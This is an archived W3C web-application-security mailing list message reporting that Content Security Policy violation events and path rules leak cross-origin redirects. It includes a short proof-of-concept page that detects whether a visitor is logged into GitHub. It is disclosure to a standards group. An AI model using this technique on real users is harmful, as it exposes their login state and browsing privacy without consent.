Cross-origin leakage with securitypolicyviolation events and paths in source expressions. from Mike West on 2013-05-05 (public-webappsec@w3.org from May 2013)

From: Mike West <mkwst@google.com>
Date: Sun, 5 May 2013 09:18:18 +0200
To: "public-webappsec@w3.org" <public-webappsec@w3.org>
Cc: Adam Barth <w3c@adambarth.com>, "dveditz@mozilla.com" <dveditz@mozilla.com>, "Hill, Brad" <bhill@paypal-inc.com>
Message-ID: <CAKXHy=cspAm3zWpstVz_VWa0o073t5jJ-2XY+qqtuAVCAN-g7w@mail.gmail.com>

It appears that securitypolicyviolation events and paths in source
expressions are unintentionally useful for determining whether or not
redirects occur. For example, I can determine pretty trivially whether or
not a user is logged into GitHub with the following page in Chrome Canary
(with "Experimental WebKit Features" enabled):

  <!DOCTYPE html>
  <html>
  <head>
    <meta http-equiv="Content-Security-Policy" content="frame-src
https://github.com/notifications">
  </head>
  <body>
    <script>
      document.addEventListener('securitypolicyviolation', function (e) {
        console.log(e);
      });
      var frame = document.createElement('iframe');
      document.body.appendChild(frame);
      frame.src = 'https://github.com/notifications';
    </script>
  </body>
  </html>

I don't see a trivial mitigation; if we have paths, then detecting
violations with some granularity is possible already via the POSTed report.
The violation event simply makes reacting to such detection easier. :/

--
Mike West <mkwst@google.com>, Developer Advocate
Google Germany GmbH, Dienerstrasse 12, 80331 M�nchen, Germany
Google+: https://mkw.st/+, Twitter: @mikewest, Cell: +49 162 10 255 91

Received on Sunday, 5 May 2013 07:19:06 UTC